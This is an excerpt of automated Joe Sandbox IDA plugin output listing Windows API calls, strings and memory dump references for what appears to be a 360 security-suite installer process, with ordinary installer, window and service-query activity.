                                                                                                                                                                      • WSAAsyncSelect.WS2_32(?,00000000,?,0000003F), ref: 5F520811
                                                                                                                                                                      • htonl.WS2_32(00000000), ref: 5F52082C
                                                                                                                                                                      • htons.WS2_32(?), ref: 5F520838
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$AsyncSelect$htonlhtonssocket
                                                                                                                                                                      • String ID:
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetClientRect.USER32(00000005,?), ref: 001B4AAC
                                                                                                                                                                      • MoveWindow.USER32(?,?,00000104,000000AF,00000050,00000001,?,00000000,?,00198E02,00000000,?,?,360Installer,00000000), ref: 001B4AE4
                                                                                                                                                                      • MoveWindow.USER32(?,?,000000CE,000000AF,00000050,00000001,?,00000000,?,00198E02,00000000,?,?,360Installer,00000000), ref: 001B4B04
                                                                                                                                                                      • ShowWindow.USER32(?,00000000,?,00000000,?,00198E02,00000000,?,?,360Installer,00000000,?,.dir,?), ref: 001B4B17
                                                                                                                                                                      • DestroyWindow.USER32(?,?,00000000,?,00198E02,00000000,?,?,360Installer,00000000,?,.dir,?), ref: 001B4B2E
                                                                                                                                                                      • ShowWindow.USER32(?,00000000,?,00000000,?,00198E02,00000000,?,?,360Installer,00000000,?,.dir,?), ref: 001B4B3B
                                                                                                                                                                      • ShowWindow.USER32(?,00000001,?,00000000,?,00198E02,00000000,?,?,360Installer,00000000,?,.dir,?), ref: 001B4B47
                                                                                                                                                                        • Part of subcall function 001A58F3: __EH_prolog3.LIBCMT ref: 001A58FA
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$Show$Move$ClientDestroyH_prolog3Rect
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1342398966-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 001EEABD
                                                                                                                                                                      • __calloc_crt.LIBCMT ref: 001EEAC9
                                                                                                                                                                      • __getptd.LIBCMT ref: 001EEAD6
                                                                                                                                                                      • __initptd.LIBCMT ref: 001EEADF
                                                                                                                                                                      • CreateThread.KERNEL32(?,?,001EEA09,00000000,?,?), ref: 001EEB0D
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 001EEB17
                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 001EEB2F
                                                                                                                                                                        • Part of subcall function 001E98D1: __getptd_noexit.LIBCMT ref: 001E98D1
                                                                                                                                                                        • Part of subcall function 001EA5B1: __decode_pointer.LIBCMT ref: 001EA5BC
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit__initptd
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3358092440-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 001D1DD0
                                                                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,?,00000000,0017BD49,?), ref: 001D1E06
                                                                                                                                                                      • DeviceIoControl.KERNEL32(00000000,002D1080,00000000,00000000,?,0000000C,?,00000000), ref: 001D1E30
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,0017BD49,?), ref: 001D1E3B
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,0017BD49,?), ref: 001D1E43
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandle$ControlCreateDeviceFile_memset
                                                                                                                                                                      • String ID: \\.\%c:
                                                                                                                                                                      • API String ID: 2281634102-1260769427
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 001D563E
                                                                                                                                                                      • GetDC.USER32(00000000), ref: 001D564B
                                                                                                                                                                        • Part of subcall function 001D548F: _memset.LIBCMT ref: 001D54B5
                                                                                                                                                                        • Part of subcall function 001D548F: GetVersionExW.KERNEL32(?), ref: 001D54C8
                                                                                                                                                                      • EnumFontFamiliesW.GDI32(00000000,00000000,001D559A), ref: 001D5666
                                                                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 001D56BF
                                                                                                                                                                      • CreateFontW.GDI32(000000F4,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000086,00000000,00000000,00000000,00000020,?), ref: 001D56DF
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Font$CreateEnumFamiliesH_prolog3_catchReleaseVersion_memset
                                                                                                                                                                      • String ID: Tahoma
                                                                                                                                                                      • API String ID: 3542596840-3580928618
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 001C8657: _memset.LIBCMT ref: 001C867B
                                                                                                                                                                        • Part of subcall function 001C8657: _memset.LIBCMT ref: 001C868C
                                                                                                                                                                        • Part of subcall function 001C8657: GetVersionExW.KERNEL32(?,?,?,?,?,?,00000000), ref: 001C86A1
                                                                                                                                                                        • Part of subcall function 001C8657: GetVersionExW.KERNEL32(?,?,?,?,?,?,00000000), ref: 001C86B2
                                                                                                                                                                        • Part of subcall function 001C8657: GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,00000000), ref: 001C86C2
                                                                                                                                                                        • Part of subcall function 001C8657: GetProcAddress.KERNEL32(00000000), ref: 001C86C9
                                                                                                                                                                        • Part of subcall function 001C8657: GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,00000000), ref: 001C86D7
                                                                                                                                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,00000000,?,?,?,?,?,001CEAAD,?,0017BD49,00100000,00000000,0000008C), ref: 001CD391
                                                                                                                                                                      • OpenServiceW.ADVAPI32(00000000,360FsFlt,00000034,?,?,?,?,001CEAAD,?,0017BD49,00100000,00000000,0000008C), ref: 001CD3A5
                                                                                                                                                                      • QueryServiceStatusEx.ADVAPI32(00000000,00000000,?,00000024,0000008C,?,?,?,?,001CEAAD,?,0017BD49,00100000,00000000,0000008C), ref: 001CD3BD
                                                                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,001CEAAD,?,0017BD49,00100000,00000000,0000008C), ref: 001CD3D5
                                                                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,001CEAAD,?,0017BD49,00100000,00000000,0000008C), ref: 001CD3D8
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Service$Handle$CloseOpenVersion_memset$AddressInfoManagerModuleNativeProcQueryStatusSystem
                                                                                                                                                                      • String ID: 360FsFlt
                                                                                                                                                                      • API String ID: 470164251-3852983893
                                                                                                                                                                      APIs
                                                                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 5F52ACA5
                                                                                                                                                                      • __calloc_crt.LIBCMT ref: 5F52ACB1
                                                                                                                                                                      • __getptd.LIBCMT ref: 5F52ACBE
                                                                                                                                                                      • CreateThread.KERNEL32(?,?,5F52ABF1,00000000,?,?), ref: 5F52ACF5
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 5F52ACFF
                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 5F52AD17
                                                                                                                                                                        • Part of subcall function 5F52DC8C: __getptd_noexit.LIBCMT ref: 5F52DC8C
                                                                                                                                                                        • Part of subcall function 5F528356: __decode_pointer.LIBCMT ref: 5F528361
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1803633139-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000080,00000000), ref: 001817F0
                                                                                                                                                                      • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00181808
                                                                                                                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00181831
                                                                                                                                                                      • SetFileTime.KERNEL32(00000000,?,00000000,?), ref: 0018183F
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00181846
                                                                                                                                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 00181853
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$Time$AttributesCloseCreateDateHandleLocal
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 820720069-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 001A73F4
                                                                                                                                                                      • _memset.LIBCMT ref: 001A7422
                                                                                                                                                                        • Part of subcall function 001E3480: _memset.LIBCMT ref: 001E34C1
                                                                                                                                                                        • Part of subcall function 001E3480: _memset.LIBCMT ref: 001E34DE
                                                                                                                                                                        • Part of subcall function 001E3480: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,0024CDA4,00000000), ref: 001E34ED
                                                                                                                                                                        • Part of subcall function 001A71E2: _memset.LIBCMT ref: 001A7216
                                                                                                                                                                        • Part of subcall function 001A71E2: SHGetValueW.SHLWAPI(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe,Path,?,?,?,?,?,0024CDA4), ref: 001A7239
                                                                                                                                                                        • Part of subcall function 001A71E2: PathCombineW.SHLWAPI(?,?,360safe.exe,?,?,?,0024CDA4), ref: 001A7269
                                                                                                                                                                        • Part of subcall function 001A71E2: PathFileExistsW.SHLWAPI(?,?,?,0024CDA4), ref: 001A7273
                                                                                                                                                                      Strings
                                                                                                                                                                      • http://s.360.cn/safe/instcomp.htm?soft=%d&status=%d&m=%s&from=%s&vv=10&installed=%d, xrefs: 001A7473
                                                                                                                                                                      • &pid=, xrefs: 001A74CF
                                                                                                                                                                      • &ver=, xrefs: 001A74AF
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memset$Path$CombineExistsFileH_prolog3Valuelstrlen
                                                                                                                                                                      • String ID: &pid=$&ver=$http://s.360.cn/safe/instcomp.htm?soft=%d&status=%d&m=%s&from=%s&vv=10&installed=%d
                                                                                                                                                                      • API String ID: 3972583164-2772831180
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      • [%d.] CheckFile p2s Start , xrefs: 5F4FAEEA
                                                                                                                                                                      • [%d.] Rename start , xrefs: 5F4FAF2F
                                                                                                                                                                      • [%d.] CheckFile Start , xrefs: 5F4FAEA6
                                                                                                                                                                      • [%d.]No CheckFileMsg FileSize:%I64d , xrefs: 5F4FAE69
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: H_prolog3_
                                                                                                                                                                      • String ID: [%d.] CheckFile Start $[%d.] CheckFile p2s Start $[%d.] Rename start $[%d.]No CheckFileMsg FileSize:%I64d
                                                                                                                                                                      • API String ID: 2427045233-3735358712
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00172750: _vswprintf_s.LIBCMT ref: 00172783
                                                                                                                                                                      • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,00000104,00000000), ref: 001E291E
                                                                                                                                                                      • DeviceIoControl.KERNEL32 ref: 001E296D
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 001E29BD
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseControlCreateDeviceFileHandle_vswprintf_s
                                                                                                                                                                      • String ID: %02X%02X%02X%02X%02X%02X$\\.\%s
                                                                                                                                                                      • API String ID: 2864800763-1525991222
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 001986BD
                                                                                                                                                                      • _memset.LIBCMT ref: 001986F8
                                                                                                                                                                      • GetClassNameW.USER32(?,00000000,00000104), ref: 0019870B
                                                                                                                                                                        • Part of subcall function 00177FA1: __wcsicoll.LIBCMT ref: 00177FB9
                                                                                                                                                                      • IsDialogMessageW.USER32(?,?), ref: 00198757
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ClassDialogH_prolog3MessageName__wcsicoll_memset
                                                                                                                                                                      • String ID: EDIT
                                                                                                                                                                      • API String ID: 858151411-3080729518
                                                                                                                                                                      • Opcode ID: 441353c10504e037a6842f5312685ff64688444dcdba846559d49eb064941109
                                                                                                                                                                      • Instruction ID: c0082edea9045fdbf1335515a871879780deee6b33873d4a46dbd36c49b7d752
                                                                                                                                                                      • Opcode Fuzzy Hash: 441353c10504e037a6842f5312685ff64688444dcdba846559d49eb064941109
                                                                                                                                                                      • Instruction Fuzzy Hash: ED2105759002489BDF28EFA4EC49AFE73A5FF26710F108929E926D72D1DF30A944C760
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateFileW.KERNEL32(?,00000000,00000000,00000000,00000003,00000080,00000000,?,?,5F4DCDEF,?), ref: 5F4DC48D
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,5F4DCDEF,?), ref: 5F4DC4A4
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,5F4DCDEF,?), ref: 5F4DC499
                                                                                                                                                                        • Part of subcall function 5F51405E: _memset.LIBCMT ref: 5F514091
                                                                                                                                                                        • Part of subcall function 5F51405E: wvnsprintfW.SHLWAPI(?,000003FF,5F5BC288,5F4FE1F9), ref: 5F5140AC
                                                                                                                                                                      Strings
                                                                                                                                                                      • exception raised in method CFileMgr::IsFileExisting, parameter pFileName can not be null, xrefs: 5F4DC471
                                                                                                                                                                      • IsFileExisting Error = %d, xrefs: 5F4DC4D5
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseCreateErrorFileHandleLast_memsetwvnsprintf
                                                                                                                                                                      • String ID: IsFileExisting Error = %d$exception raised in method CFileMgr::IsFileExisting, parameter pFileName can not be null
                                                                                                                                                                      • API String ID: 162527170-4251026172
                                                                                                                                                                      • Opcode ID: c4fb67abbaeeb17b8c594129421b2efb50282dd80a162bcbf3171b4d188ab24c
                                                                                                                                                                      • Instruction ID: 3e26a2ab6796d4a6c721a87da82004ab5621eb1fda04ef1b96428c76c67345f6
                                                                                                                                                                      • Opcode Fuzzy Hash: c4fb67abbaeeb17b8c594129421b2efb50282dd80a162bcbf3171b4d188ab24c
                                                                                                                                                                      • Instruction Fuzzy Hash: 6D01D6F1005110A7D63139655E789BFBABDCF8753CB624927F2ABD6191C530A4C185A2
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 5F51FD34
                                                                                                                                                                      • htonl.WS2_32(00000000), ref: 5F51FD46
                                                                                                                                                                      • htons.WS2_32(00000000), ref: 5F51FD52
                                                                                                                                                                      • sendto.WS2_32(000007A4,00000000,C7R_,5F5BC814,00000000,00000010), ref: 5F51FD6C
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memsethtonlhtonssendto
                                                                                                                                                                      • String ID: C7R_
                                                                                                                                                                      • API String ID: 2645352339-4204308585
                                                                                                                                                                      • Opcode ID: a4529193e1b0d4a591c2cd7285678b14c0f56e672dd1a6e6246a2b418558d7bd
                                                                                                                                                                      • Instruction ID: d6b44efe53659da487ad8316fe5b066c8600fbfb373acbc943df9c86660c656d
                                                                                                                                                                      • Opcode Fuzzy Hash: a4529193e1b0d4a591c2cd7285678b14c0f56e672dd1a6e6246a2b418558d7bd
                                                                                                                                                                      • Instruction Fuzzy Hash: EA115E76900208EFDB01DFA4C945EEF7BB5FF48720F10052AF905AB150D771AA64DBA1
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 001A35AF
                                                                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 001A35C0
                                                                                                                                                                      • SetFocus.USER32(?), ref: 001A35C9
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 001A35D6
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LongWindow$CurrentFocusThread
                                                                                                                                                                      • String ID: D!
                                                                                                                                                                      • API String ID: 2448781475-911024508
                                                                                                                                                                      • Opcode ID: 588fcff5c9c93f5fea8290db40d63ab6d2bc7080d7a88357061aa684a8ae1e8f
                                                                                                                                                                      • Instruction ID: 42c6c13f5e1a5f8d5d576227e5fe90e0032ee7b9a8388b983ac4d062e7139fc9
                                                                                                                                                                      • Opcode Fuzzy Hash: 588fcff5c9c93f5fea8290db40d63ab6d2bc7080d7a88357061aa684a8ae1e8f
                                                                                                                                                                      • Instruction Fuzzy Hash: 25F0FC71914610AFDB05A764DD0EE9F76A9EF25710F118518B82793191DF309E019A51
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 001B1A49
                                                                                                                                                                      • IsWindowEnabled.USER32(?), ref: 001B1A5E
                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 001B1A91
                                                                                                                                                                      • GetWindowTextW.USER32(?,00000000,00000080), ref: 001B1AD7
                                                                                                                                                                      • IsWindowEnabled.USER32(?), ref: 001B1B05
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$Enabled$ClientH_prolog3RectText
                                                                                                                                                                      • String ID:
